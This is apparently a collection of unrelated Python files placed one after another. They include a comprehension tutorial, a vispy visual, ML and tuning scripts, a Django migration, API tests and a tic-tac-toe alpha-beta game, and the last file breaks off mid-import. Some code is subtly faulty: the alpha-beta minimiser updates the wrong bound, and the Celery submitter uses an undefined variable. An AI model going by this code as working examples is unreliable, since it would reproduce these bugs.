reduce(function, sequence[, initial]) -> value
Apply a function of two arguments cumulatively to the items of a sequence,
from left to right, so as to reduce the sequence to a single value.
For example, reduce(lambda x, y: x+y, [1, 2, 3, 4, 5]) calculates
((((1+2)+3)+4)+5). If initial is present, it is placed before the items
of the sequence in the calculation, and serves as a default when the
sequence is empty. [9]
"""
#22 What is list comprehension for ?
# In short It is a list operation that allows the outputs to remain as a list with a faster effort
# as a result of a series of operations.
# FORMAL DEFINITIONS :
'''List comprehension offers a shorter syntax when you want to create a new list based on the values of
an existing list.[10]'''
#List comprehensions provide a concise way to create lists. Common applications are to make new lists
# where each element is the result of some operations applied to each member of another sequence
# or iterable, or to create a subsequence of those elements that satisfy a certain condition. [11]
#23 Please multiple every price in price list by 3 and hold them in the list compherension.
prices = [10000, 20000, 30000, 40000, 50000]
[i*3 for i in prices ]
#23.1- At that time If prices are lower than 30000 multiple by 3 . Use list compherension
[i*3 for i in prices if i<30000 ]
#23.2- At this time If prices are lower than 30000 multiple by 3 . otherwise apply
# new_prices() . Use list compherension
[i * 3 if i < 30000 else new_prices(i) for i in prices ]
#23.3- At this time If prices are lower than 30000 multiple by 3 and apply new_prices(). Otherwise only apply
# new_prices() . Use list compherension
[3*new_prices(i) if i < 30000 else new_prices(i) for i in prices ]
#24 When to use the list comprehensions ?
# In short when we want to processes easier
# FORMAL DEFINITIONS :
''' List comprehensions provide us with a simple way to create a list based on some iterable.
# During the creation, elements from the iterable can be conditionally included
in the new list and transformed as needed.[12] '''
#25 There are 2 list exist. Use List comprehension.Loop in "employee" list and create a new list.
# if the names in "employee" exist in the "non_employee" list write the first letters of them
# in lower case to the new list. Add the other names in capital case to the list.
employee = ["Ulas", "John", "Connor", "Sarah"]
non_employee = ["John", "Sarah"]
[i.lower() if i in non_employee else i for i in employee]
#26 What is Dictionary Comprehensions {} and when to use ?
# In short it is a structure that keep keys and values in pairs.
# We use "{}" When we want to keep key and value
# operation results as a dictionary .
# FORMAL DEFINITIONS :
''' Returns a dictionary based on existing iterables.[13]'''
#27 What happens when key(),value(),items() functions used sequentially on dictionary ?
dictionary = {'one': 1, 'two': 2, 'three': 3, 'four': 4}
dictionary.values()
dictionary.keys()
dictionary.items()
#28 Use DC (Dictionary Comprehension) and take the second power of all values in "dictionary".
{ keys:values**2 for keys,values in dictionary.items() }
#28.1 Use DC (Dictionary Comprehension) and turn to the capital case of all keys in "dictionary".
{ keys.upper():values for keys,values in dictionary.items() }
#28.2 Double the keys existing values
{ keys*2:values for keys,values in dictionary.items() }
#29 Print the even numbers with Dictionary Comprehension as key and their square as value
numbers = range(10)
{ keys: keys**2 for keys in numbers if keys%2==0 }
#SOURCES :
#[*]: All information started with `In short` : https://www.veribilimiokulu.com - Mr Mustafa Vahit Keskin ( Data Scientist ) - DSMLBC4 (2021)
#[1]: https://docs.python.org/3/library/venv.html
#[2]: https://docs.conda.io/en/master/
#[3]: https://docs.conda.io/en/master/
#[4] https://en.wikipedia.org/wiki/Enumerated_type#:~:text=From%20Wikipedia%2C%20the%20free%20encyclopedia,or%20enumerators%20of%20the%20type.
#[5]: https://careerkarma.com/blog/python-enumerate/
#[6]: https://www.w3schools.com/python/ref_func_enumerate.asp
#[7]: https://docs.python.org/3.8/library/functions.html#map & jetbrains help documentation
#[8]: https://stackoverflow.com/questions/10973766/understanding-the-map-function
#[9]: https://docs.python.org/3.8/library/functools.html#functools.reduce
#[10]: https://www.w3schools.com/python/python_lists_comprehension.asp
#[11]: https://docs.python.org/3/tutorial/datastructures.html
#[12]: https://towardsdatascience.com/python-basics-list-comprehensions-631278f22c40
#[13]: https://python-reference.readthedocs.io/en/latest/docs/comprehensions/dict_comprehension.html
|
import os
import sipconfig
#CAS: this is a win32 version, specific to my machine, provided for example.
# The name of the SIP build file generated by SIP and used by the build
# system.
build_file = "blist.sbf"
# Get the SIP configuration information.
config = sipconfig.Configuration()
# Run SIP to generate the code.
os.system(" ".join([config.sip_bin, "-c", ".", "-b", build_file, "sip/blist.sip"]))
# Create the Makefile.
makefile = sipconfig.SIPModuleMakefile(config, build_file)
# Add the library we are wrapping. The name doesn't include any platform
# specific prefixes or extensions (e.g. the "lib" prefix on UNIX, or the
# ".dll" extension on Windows).
makefile.extra_libs = ['buddylist']
makefile.extra_include_dirs.append(r'C:\Users\Christopher\workspace\boost_1_42_0')
makefile.extra_cxxflags.append('//EHsc')
makefile.extra_lib_dirs.extend([r'C:\Users\Christopher\workspace\digsby\ext\src\BuddyList\msvc2008\Release'])
makefile._build['objects'] += " PythonInterface.obj FileUtils.obj"
makefile._build['sources'] += " PythonInterface.cpp FileUtils.cpp"
# Generate the Makefile itself.
makefile.generate()
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Code heavily inspired by:
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
#
# Modified by:
# author: John Bass
# email: john.bobzwik@gmail.com
# license: MIT
# Please feel free to use and modify this, but keep the above information. Thanks!
# -----------------------------------------------------------------------------
import numpy as np
from vispy.geometry import create_box
from vispy.visuals.mesh import MeshVisual
from vispy.visuals.visual import CompoundVisual
from vispy.scene.visuals import create_visual_node
from .varvismesh import VarVisMeshVisual
class BoxMarkersVisual(CompoundVisual):
"""Visual that displays a box.
Parameters
----------
point_coords : array_like
Marker coordinates
width : float
Box width.
height : float
Box height.
depth : float
Box depth.
width_segments : int
Box segments count along the width.
height_segments : float
Box segments count along the height.
depth_segments : float
Box segments count along the depth.
planes: array_like
Any combination of ``{'-x', '+x', '-y', '+y', '-z', '+z'}``
Included planes in the box construction.
vertex_colors : ndarray
Same as for `MeshVisual` class. See `create_plane` for vertex ordering.
face_colors : ndarray
Same as for `MeshVisual` class. See `create_plane` for vertex ordering.
color : Color
The `Color` to use when drawing the cube faces.
edge_color : tuple or Color
The `Color` to use when drawing the cube edges. If `None`, then no
cube edges are drawn.
"""
def __init__(self, point_coords=np.array([0,0,0]), width=1, height=1, depth=1, width_segments=1,
height_segments=1, depth_segments=1, planes=None, vertex_colors=None, face_colors=None,
color=(0.5, 0.5, 1, 1), edge_color=None, variable_vis=False, **kwargs):
self.point_coords = point_coords
self.nb_points = point_coords.shape[0]
self.width = width
self.height = height
self.depth = depth
self.color = color
self._variable_vis = variable_vis
# Create a unit box
width_box = 1
height_box = 1
depth_box = 1
scale = np.array([width, height, depth])
self.vertices_box, self.filled_indices_box, self.outline_indices_box = create_box(
width_box, height_box, depth_box, width_segments, height_segments,
depth_segments, planes)
# Store number of vertices, filled_indices and outline_indices per box
self.nb_v = self.vertices_box.shape[0]
self.nb_fi = self.filled_indices_box.shape[0]
self.nb_oi = self.outline_indices_box.shape[0]
# Create empty arrays for vertices, filled_indices and outline_indices
vertices = np.zeros(self.nb_v*point_coords.shape[0],
[('position', np.float32, 3),
('texcoord', np.float32, 2),
('normal', np.float32, 3),
('color', np.float32, 4)])
filled_indices = np.zeros([self.nb_fi*point_coords.shape[0], 3], np.uint32)
outline_indices = np.zeros([self.nb_oi*point_coords.shape[0], 2], np.uint32)
if self.variable_vis:
# "box_to_face" and "box_to_outl" represent array of faces and
# outlines indexes associated to each box
box_to_face = np.zeros([point_coords.shape[0], self.nb_fi], np.uint32)
box_to_outl = np.zeros([point_coords.shape[0], self.nb_oi], np.uint32)
# Iterate for every marker
for i in range(self.nb_points):
idx_v_start = self.nb_v*i
idx_v_end = self.nb_v*(i+1)
idx_fi_start = self.nb_fi*i
idx_fi_end = self.nb_fi*(i+1)
idx_oi_start = self.nb_oi*i
idx_oi_end = self.nb_oi*(i+1)
# Scale and translate unit box
vertices[idx_v_start:idx_v_end]['position'] = self.vertices_box['position']*scale + point_coords[i]
filled_indices[idx_fi_start:idx_fi_end] = self.filled_indices_box + idx_v_start
outline_indices[idx_oi_start:idx_oi_end] = self.outline_indices_box + idx_v_start
if self.variable_vis:
box_to_face[i,:] = np.arange(idx_fi_start,idx_fi_end)
box_to_outl[i,:] = np.arange(idx_oi_start,idx_oi_end)
if self.variable_vis:
self.box_to_face = box_to_face
self.box_to_outl = box_to_outl
self._visible_boxes = np.arange(self.nb_points)
# Create MeshVisual for faces and borders
self._mesh = VarVisMeshVisual(self.nb_points, vertices['position'], filled_indices,
vertex_colors, face_colors, color, variable_vis=variable_vis)
if edge_color:
self._border = VarVisMeshVisual(self.nb_points, vertices['position'], outline_indices,
color=edge_color, mode='lines', variable_vis=variable_vis)
else:
self._border = VarVisMeshVisual(self.nb_points)
CompoundVisual.__init__(self, [self._mesh, self._border], **kwargs)
self.mesh.set_gl_state(polygon_offset_fill=True,
polygon_offset=(1, 1), depth_test=True)
self.freeze()
def set_visible_boxes(self, idx_box_vis):
"""Set which boxes are visible.
Parameters
----------
idx_box_vis : Array like
Index array of ALL visible boxes of point_coords
"""
if not self.variable_vis:
raise ValueError('Variable visibility must be enabled via "variable_vis"')
# Find which boxes are now visible that weren't last update of 'self.visible_boxes',
# and vice-versa
newbox_vis = np.setdiff1d(idx_box_vis, self.visible_boxes)
oldbox_vis = np.setdiff1d(self.visible_boxes, idx_box_vis)
# Get the new visible vertices indexes for the faces (mesh) and outlines (border)
# and the new invisible vertices indexes
idx_face_vis = np.ravel(self.box_to_face[newbox_vis])
idx_outl_vis = np.ravel(self.box_to_outl[newbox_vis])
idx_face_invis = np.ravel(self.box_to_face[oldbox_vis])
idx_outl_invis = np.ravel(self.box_to_outl[oldbox_vis])
# Update mesh visibility bool array
self.mesh.set_visible_faces(idx_face_vis)
self.mesh.set_invisible_faces(idx_face_invis)
self.mesh.update_vis_buffer()
# Update border visibility bool array
self.border.set_visible_faces(idx_outl_vis)
self.border.set_invisible_faces(idx_outl_invis)
self.border.update_vis_buffer()
# Update 'self.visible_boxes'
self.visible_boxes = idx_box_vis
def set_data(self, point_coords=None, width=None, height=None, depth=None, vertex_colors=None, face_colors=None, color=None, edge_color=None):
if point_coords is None:
point_coords = self.point_coords
else:
self.point_coords = point_coords
if width is None:
width = self.width
else:
self.width = width
if height is None:
height = self.height
else:
self.height = height
if depth is None:
depth = self.depth
else:
self.depth = depth
if color is None:
color = self.color
else:
self.color = color
self.nb_points = point_coords.shape[0]
# Create empty arrays for vertices, filled_indices and outline_indices
vertices = np.zeros(self.nb_v*point_coords.shape[0],
[('position', np.float32, 3),
('texcoord', np.float32, 2),
('normal', np.float32, 3),
('color', np.float32, 4)])
filled_indices = np.zeros([self.nb_fi*point_coords.shape[0], 3], np.uint32)
outline_indices = np.zeros([self.nb_oi*point_coords.shape[0], 2], np.uint32)
if self.variable_vis:
# "box_to_face" and "box_to_outl" represent array of faces and
# outlines indexes associated to each box
box_to_face = np.zeros([point_coords.shape[0], self.nb_fi], np.uint32)
box_to_outl = np.zeros([point_coords.shape[0], self.nb_oi], np.uint32)
scale = np.array([width, height, depth])
# Iterate for every marker
for i in range(point_coords.shape[0]):
idx_v_start = self.nb_v*i
idx_v_end = self.nb_v*(i+1)
idx_fi_start = self.nb_fi*i
idx_fi_end = self.nb_fi*(i+1)
idx_oi_start = self.nb_oi*i
idx_oi_end = self.nb_oi*(i+1)
# Scale and translate unit box
vertices[idx_v_start:idx_v_end]['position'] = self.vertices_box['position']*scale + point_coords[i]
filled_indices[idx_fi_start:idx_fi_end] = self.filled_indices_box + idx_v_start
outline_indices[idx_oi_start:idx_oi_end] = self.outline_indices_box + idx_v_start
if self.variable_vis:
box_to_face[i,:] = np.arange(idx_fi_start,idx_fi_end)
box_to_outl[i,:] = np.arange(idx_oi_start,idx_oi_end)
if self.variable_vis:
self.box_to_face = box_to_face
self.box_to_outl = box_to_outl
self._visible_boxes = np.arange(self.nb_points)
# Create MeshVisual for faces and borders
self.mesh.set_data(vertices['position'], filled_indices, vertex_colors, face_colors, color)
self.border.set_data(vertices['position'], outline_indices, color=edge_color)
@property
def variable_vis(self):
"""Bool if instance of BoxMarkersVisual posseses variable visibility.
"""
return self._variable_vis
@variable_vis.setter
def variable_vis(self, variable_vis):
raise ValueError('Not allowed to change "variable_vis" after initialization.')
@property
def visible_boxes(self):
"""Array of indexes of boxes that are currently visible.
"""
if not self.variable_vis:
raise ValueError('Variable visibility must be enabled via "variable_vis".')
return self._visible_boxes
@visible_boxes.setter
def visible_boxes(self, visible_boxes):
if not self.variable_vis:
raise ValueError('Variable visibility must be enabled via "variable_vis".')
self._visible_boxes = visible_boxes
@property
def mesh(self):
"""The vispy.visuals.MeshVisual that used to fill in.
"""
return self._mesh
@mesh.setter
def mesh(self, mesh):
self._mesh = mesh
@property
def border(self):
"""The vispy.visuals.MeshVisual that used to draw the border.
"""
return self._border
@border.setter
def border(self, border):
self._border = border
BoxMarkers = create_visual_node(BoxMarkersVisual)
|
# Generated by Django 3.0 on 2021-03-07 20:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lms_app', '0004_auto_20210228_2000'),
]
operations = [
migrations.AddField(
model_name='video',
name='vimeo_video',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
|
#!/usr/bin/python
import Queue
import subprocess
import os
import datetime
import argparse
import shutil
import multiprocessing
from celery import Celery
from gridmaster import submit
from gridmaster import getwork
from gridmaster import donework
def main():
parser = argparse.ArgumentParser()
parser.add_argument("filename", help='file containing newline-separated jobs', type = str)
args = parser.parse_args()
with open(args.filename, 'r') as fh:
for line in fh:
if line[0] != '#':
submit.delay(job_command)
if __name__ == "__main__":
main()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import stats
from sklearn import base, cross_validation
from sklearn.externals import joblib
from .sofia_ml import svm_train, learner_type, loop_type, eta_type
class RankSVM(base.BaseEstimator):
""" RankSVM model using stochastic gradient descent.
TODO: does this fit intercept ?
Parameters
----------
alpha : float
model : str, default='rank'
max_iter : int, default=1000
Number of stochastic gradient steps to take
"""
def __init__(self, alpha=1., model='rank', max_iter=1000):
self.alpha = alpha
self.max_iter = max_iter
self.model = model
def fit(self, X, y, query_id=None):
n_samples, n_features = X.shape
self.coef_ = svm_train(X, y, query_id, self.alpha, n_samples,
n_features, learner_type.sgd_svm,
loop_type.rank, eta_type.basic_eta,
max_iter=self.max_iter)
return self
def rank(self, X):
order = np.argsort(X.dot(self.coef_))
order_inv = np.zeros_like(order)
order_inv[order] = np.arange(len(order))
return order_inv
# just so that GridSearchCV doesn't complain
predict = rank
def score(self, X, y):
tau, _ = stats.kendalltau(X.dot(self.coef_), y)
return np.abs(tau)
def _inner_fit(X, y, query_id, train, test, alpha):
# aux method for joblib
clf = RankSVM(alpha=alpha)
if query_id is None:
clf.fit(X[train], y[train])
else:
clf.fit(X[train], y[train], query_id[train])
return clf.score(X[test], y[test])
class RankSVMCV(base.BaseEstimator):
"""
Cross-validated RankSVM
the cross-validation generator will be ShuffleSplit
"""
def __init__(self, alphas=np.logspace(-1, 4, 5), cv=5,
n_jobs=1, model='rank', max_iter=1000):
self.alphas = alphas
self.max_iter = max_iter
self.model = model
self.cv = cv
self.n_jobs = n_jobs
def fit(self, X, y, query_id=None):
if hasattr(self.cv, '__iter__'):
cv = self.cv
else:
cv = cross_validation.ShuffleSplit(len(y), n_iter=self.cv)
mean_scores = []
if query_id is not None:
query_id = np.array(query_id)
if not len(query_id) == len(y):
raise ValueError('query_id of wrong shape')
for a in self.alphas:
scores = joblib.Parallel(n_jobs=self.n_jobs)(
joblib.delayed(_inner_fit)
(X, y, query_id, train, test, a) for train, test in cv)
mean_scores.append(np.mean(scores))
self.best_alpha_ = self.alphas[np.argmax(mean_scores)]
self.estimator_ = RankSVM(self.best_alpha_)
self.estimator_.fit(X, y, query_id)
self.rank = self.estimator_.rank
def score(self, X, y):
return self.estimator_.score(X, y)
def predict(self, X):
return self.estimator_.predict(X)
|
# Importing the Libraries
import tensorflow as tf
import nni
# loading the MNIST dataset & performing the Normalization
def load_dataset():
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
return (x_train/255., y_train), (x_test/255., y_test)
# Creating the Sequential Model
def create_model(num_units, dropout_rate, lr, activation):
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(num_units, activation=activation),
tf.keras.layers.Dropout(dropout_rate),
tf.keras.layers.Dense(10, activation="softmax")
])
model.compile(
loss="sparse_categorical_crossentropy",
optimizer=tf.keras.optimizers.Adam(lr=lr),
metrics=["accuracy"]
)
return model
# Defining the callbacks
class ReportIntermediates(tf.keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
acc = logs.get("val_accuracy") or 0.
nni.report_intermediate_result(acc)
def main(params):
num_units = params.get("num_units")
dropout_rate = params.get("dropout_rate")
lr = params.get("lr")
batch_size = params.get("batch_size")
activation = params.get("activation")
model = create_model(num_units, dropout_rate, lr, activation)
(x_train, y_train), (x_test, y_test) = load_dataset()
_ = model.fit(
x_train, y_train,
validation_data=(x_test, y_test),
epochs=10,
verbose=False,
batch_size=batch_size,
callbacks=[ReportIntermediates()]
)
_, acc = model.evaluate(x_test, y_test, verbose=False)
nni.report_final_result(acc)
if __name__ == "__main__":
params = {
"num_units": 32,
"dropout_rate": 0.1,
"lr": 0.0001,
"batch_size": 32,
"activation": "relu"
}
tuned_params = nni.get_next_parameter()
params.update(tuned_params)
main(params)
|
""" test get/set & misc """
import pandas as pd
from pandas import MultiIndex, Series
def test_access_none_value_in_multiindex():
# GH34318: test that you can access a None value using .loc through a Multiindex
s = Series([None], pd.MultiIndex.from_arrays([["Level1"], ["Level2"]]))
result = s.loc[("Level1", "Level2")]
assert result is None
midx = MultiIndex.from_product([["Level1"], ["Level2_a", "Level2_b"]])
s = Series([None] * len(midx), dtype=object, index=midx)
result = s.loc[("Level1", "Level2_a")]
assert result is None
s = Series([1] * len(midx), dtype=object, index=midx)
result = s.loc[("Level1", "Level2_a")]
assert result == 1
|
import base64
import gzip
from starlette.requests import Request
from starlette.responses import JSONResponse, Response
from yarl import URL
def _generate_download_link(base_url: URL, code: str) -> URL:
return base_url.with_query(gzip=base64.urlsafe_b64encode(gzip.compress(code.encode())).decode())
async def generate_download_link_handler(request: Request) -> Response:
print(request.base_url)
print(request.headers)
try:
json_data = await request.json()
except ValueError:
return Response(status_code=400)
if (
not isinstance(json_data, dict)
or json_data.keys() != {"code", "base_url"}
or not isinstance(json_data["base_url"], str)
or not isinstance(json_data["code"], str)
):
return Response(status_code=400)
try:
base_url = URL(json_data["base_url"])
except ValueError:
return Response(status_code=400)
code = json_data["code"]
download_link = _generate_download_link(URL(base_url), code)
return JSONResponse({
"download_link": str(download_link),
})
|
import copy
import random
import sys
# ------------------------------------------------------------------
def aux_print (elem):
if elem == 0:
return " . "
if elem == 1:
return " X "
if elem == -1:
return " O "
def mostra_tabuleiro(T):
for x in range (0,(9)):
if (x == 3 or x == 6):
print ("\n")
print (aux_print (T[x]), end = ""),
print ("\n")
# ------------------------------------------------------------------
# devolve a lista de ações que se podem executar partido de um estado
def acoes(T):
lista=[]
for i in range (0,(9)):
if T[i]==0:
lista.append(i)
return lista
# ------------------------------------------------------------------
# devolve o estado que resulta de partir de um estado e executar uma ação
def resultado(T,a,jog):
aux = copy.copy(T)
if aux[a]==0:
if jog == 'MAX':
aux[a]=1
else:
aux[a]=-1
return aux
# ------------------------------------------------------------------
# existem 8 possíveis alinhamentos vencedores, para cada jogador
def utilidade(T):
# testa as linhas
for i in (0,3,6):
if (T[i] == T[i+1] == T[i+2]):
if (T[i] == 1):
return 1
elif (T[i] == -1):
return -1
#testa colunas
for i in (0,1,2):
if (T[i] == T[i+3] == T[i+6]):
if (T[i] == 1):
return 1
elif (T[i] == -1):
return -1
#testa diagonais
if (T[0] == T[4] == T[8]):
if (T[0] == 1):
return 1
elif (T[0] == -1):
return -1
if (T[2] == T[4] == T[6]):
if (T[2] == 1):
return 1
elif (T[2] == -1):
return -1
# não é nodo folha ou dá empate
return 0
# ------------------------------------------------------------------
# devolve True se T é terminal, senão devolve False
def estado_terminal(T):
x = utilidade(T)
if (x == 0):
for x in range (0,9):
if (T[x] == 0):
return (False)
return (True)
# ------------------------------------------------------------------
# algoritmo da wikipedia
# https://en.wikipedia.org/wiki/Alpha%E2%80%93beta_pruning
# ignoramos a profundidade e devolvemos o valor, a ação e o estado resultante
def alfabeta(T,alfa,beta,jog):
if estado_terminal(T):
return utilidade(T),-1,-1
if jog:
v = -10
ba=-1
for a in acoes(T):
v1,ac,es = alfabeta(resultado(T,a,'MAX'),alfa,beta,False)
if v1 > v: # guardo a ação que corresponde ao melhor
v = v1
ba=a
alfa = max(alfa,v)
if beta <= alfa:
break
return v,ba,resultado(T,ba,'MAX')
else:
# COMPLETAR
v = 10
ba= -1
for a in acoes(T):
v1,ac,es = alfabeta(resultado(T,a,'MIN'),alfa,beta,True)
if v1 < v: # guardo a ação que corresponde ao melhor
v = v1
ba=a
alfa = min(alfa,v)
if beta <= alfa :
break
return v,ba,resultado(T,ba,'MIN')
# ------------------------------------------------------------------
def joga_max(T):
v,a,e = alfabeta(T,-10,10,True)
print ('MAX joga para '),a
return e
# ------------------------------------------------------------------
def joga_min(T):
v,a,e = alfabeta(T,-10,10,False)
print ('MIN joga para '),a
return e
# ------------------------------------------------------------------
def jogo(p1,p2):
# cria tabuleiro vazio
T = [0,0,0,0,0,0,0,0,0]
mostra_tabuleiro(T)
while acoes(T) != [] and not estado_terminal(T):
T=p1(T)
mostra_tabuleiro(T)
if acoes(T) != [] and not estado_terminal(T):
T=p2(T)
mostra_tabuleiro(T)
# fim
if utilidade(T) == 1:
print ('Venceu o jogador 1')
elif utilidade(T) == -1:
print ('Venceu o jogador 2')
else:
print ('Empate')
# ------------------------------------------------------------------
# jogador aleatório
def joga_rand(T):
x = random.randint(0,8)
i = True
while i:
if (T[x] == 0):
T=resultado(T,x,'MIN')
i = False
else:
x = random.randint(0,8)
print ('RAND joga para '),x
return T
# ------------------------------------------------------------------
#---------Jogador humano
def joga_utilizador(T):
print ("Introduza a posicao para que quer jogar:")
posicao = int(input("—> "))
disponiveis = acoes(T)
while posicao not in disponiveis:
posicao = int(input("—> "))
T = resultado(T, posicao, 'MIN')
print ('USER joga para '), posicao
return T
# main
# deve ganhar sempre o max:
#jogo(joga_max,joga_rand)
# devem empatar sempre:
#jogo(joga_max,joga_min)
# jogador humano vs ZI MACHINE
jogo(joga_max, joga_utilizador)
|
#!/usr/bin/python
# -*- coding:UTF-8 -*-
if __name__ == '__main__':
l1 = [3, [66, 55, 44], (7, 8, 9)]
l2 = list(l1)
l1.append(100)
l1[1].remove(55)
print('l1:', l1)
print('l2:', l2)
l2[1] += [33, 22]
l2[2] += (10, 11) # +=对雨元组来说,相当于创建了一个新的元组。
print('l1:', l1)
print('l2:', l2)
|
import json
import unittest
from libsaas import port
from libsaas.executors import test_executor
from libsaas.services import googlecalendar
from libsaas.services.base import MethodNotSupported
class GoogleCalendarTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = googlecalendar.GoogleCalendar(access_token='my-access-token')
def expect(self, method=None, uri=None, params={}, headers=None):
if method:
self.assertEqual(method, self.executor.request.method)
if uri:
self.assertEqual(self.executor.request.uri,
'https://www.googleapis.com/calendar/v3' + uri)
self.assertEqual(self.executor.request.params, params)
if headers:
self.assertEqual(self.executor.request.headers, headers)
def test_user(self):
with port.assertRaises(MethodNotSupported):
self.service.me().get()
with port.assertRaises(MethodNotSupported):
self.service.me().create()
with port.assertRaises(MethodNotSupported):
self.service.me().update()
with port.assertRaises(MethodNotSupported):
self.service.me().patch()
with port.assertRaises(MethodNotSupported):
self.service.me().delete()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().create()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().update()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().patch()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().delete()
self.service.me().settings().get()
self.expect('GET', '/users/me/settings', {})
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').create()
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').update()
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').patch()
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').delete()
self.service.me().setting('1234').get()
self.expect('GET', '/users/me/settings/1234', {})
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_lists().update()
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_lists().patch()
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_lists().delete()
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_list('1234').create()
self.service.me().calendar_lists().get()
self.expect('GET', '/users/me/calendarList', {})
obj = {'foo': 'bar'}
self.service.me().calendar_lists().create(obj)
self.expect('POST', '/users/me/calendarList', json.dumps(obj))
self.service.me().calendar_list('1234').get()
self.expect('GET', '/users/me/calendarList/1234', {})
self.service.me().calendar_list('1234').update(obj)
self.expect('PUT', '/users/me/calendarList/1234', json.dumps(obj))
self.service.me().calendar_list('1234').patch(obj)
self.expect('PATCH', '/users/me/calendarList/1234', json.dumps(obj))
self.service.me().calendar_list('1234').delete()
self.expect('DELETE', '/users/me/calendarList/1234', {})
def test_colors(self):
with port.assertRaises(MethodNotSupported):
self.service.colors().create()
with port.assertRaises(MethodNotSupported):
self.service.colors().update()
with port.assertRaises(MethodNotSupported):
self.service.colors().patch()
with port.assertRaises(MethodNotSupported):
self.service.colors().delete()
self.service.colors().get()
self.expect('GET', '/colors', {})
def test_freebusy(self):
with port.assertRaises(MethodNotSupported):
self.service.freebusy().get()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().create()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().update()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().patch()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().delete()
obj = {'foo': 'bar'}
self.service.freebusy().query(obj)
self.expect('POST', '/freeBusy', json.dumps(obj))
def test_calendar(self):
with port.assertRaises(MethodNotSupported):
self.service.calendars().get()
with port.assertRaises(MethodNotSupported):
self.service.calendars().update()
with port.assertRaises(MethodNotSupported):
self.service.calendars().patch()
with port.assertRaises(MethodNotSupported):
self.service.calendars().delete()
obj = {'foo': 'bar'}
self.service.calendars().create(obj)
self.expect('POST', '/calendars', json.dumps(obj))
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').create()
self.service.calendar('1234').get()
self.expect('GET', '/calendars/1234', {})
self.service.calendar('1234').update(obj)
self.expect('PUT', '/calendars/1234', json.dumps(obj))
self.service.calendar('1234').patch(obj)
self.expect('PATCH', '/calendars/1234', json.dumps(obj))
self.service.calendar('1234').delete()
self.expect('DELETE', '/calendars/1234', {})
self.service.calendar('1234').clear()
self.expect('POST', '/calendars/1234/clear', {})
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rules().update()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rules().patch()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rules().delete()
self.service.calendar('1234').rules().get()
self.expect('GET', '/calendars/1234/acl', {})
obj = {'foo': 'bar'}
self.service.calendar('1234').rules().create(obj)
self.expect('POST', '/calendars/1234/acl', json.dumps(obj))
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rule('1234').create()
self.service.calendar('1234').rule('1234').get()
self.expect('GET', '/calendars/1234/acl/1234', {})
self.service.calendar('1234').rule('1234').update(obj)
self.expect('PUT', '/calendars/1234/acl/1234', json.dumps(obj))
self.service.calendar('1234').rule('1234').patch(obj)
self.expect('PATCH', '/calendars/1234/acl/1234', json.dumps(obj))
self.service.calendar('1234').rule('1234').delete()
self.expect('DELETE', '/calendars/1234/acl/1234', {})
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').events().update()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').events().patch()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').events().delete()
self.service.calendar('1234').events().get()
self.expect('GET', '/calendars/1234/events', {})
self.service.calendar('1234').events().get(timeZone='UTC')
self.expect('GET', '/calendars/1234/events', {'timeZone': 'UTC'})
obj = {'foo': 'bar'}
self.service.calendar('1234').events().create(obj)
self.expect('POST', '/calendars/1234/events', json.dumps(obj))
self.service.calendar('1234').events().importing(obj)
self.expect('POST', '/calendars/1234/events/import', json.dumps(obj))
self.service.calendar('1234').events().quick_add('text', True)
self.expect('POST',
'/calendars/1234/events/quickAdd?text=text&sendNotifications=true')
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').event('1234').create()
self.service.calendar('1234').event('1234').get()
self.expect('GET', '/calendars/1234/events/1234', {})
self.service.calendar('1234').event('1234').instances()
self.expect('GET', '/calendars/1234/events/1234/instances', {})
self.service.calendar('1234').event('1234').instances(maxResults=1)
self.expect('GET', '/calendars/1234/events/1234/instances',
{'maxResults': 1})
self.service.calendar('1234').event('1234').update(obj)
self.expect('PUT', '/calendars/1234/events/1234', json.dumps(obj))
self.service.calendar('1234').event('1234').update(obj, True)
self.expect('PUT', '/calendars/1234/events/1234?alwaysIncludeEmail=true',
json.dumps(obj))
self.service.calendar('1234').event('1234').patch(obj)
self.expect('PATCH', '/calendars/1234/events/1234', json.dumps(obj))
self.service.calendar('1234').event('1234').patch(obj, sendNotifications=True)
self.expect('PATCH', '/calendars/1234/events/1234?sendNotifications=true',
json.dumps(obj))
self.service.calendar('1234').event('1234').delete()
self.expect('DELETE', '/calendars/1234/events/1234', {})
self.service.calendar('1234').event('1234').delete(True)
self.expect('DELETE', '/calendars/1234/events/1234?sendNotifications=true')
self.service.calendar('1234').event('1234').move('1234')
self.expect('POST', '/calendars/1234/events/1234/move?destination=1234')
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""The Controller class for Cities."""
import re
from flask import Blueprint, render_template, redirect, url_for, current_app, \
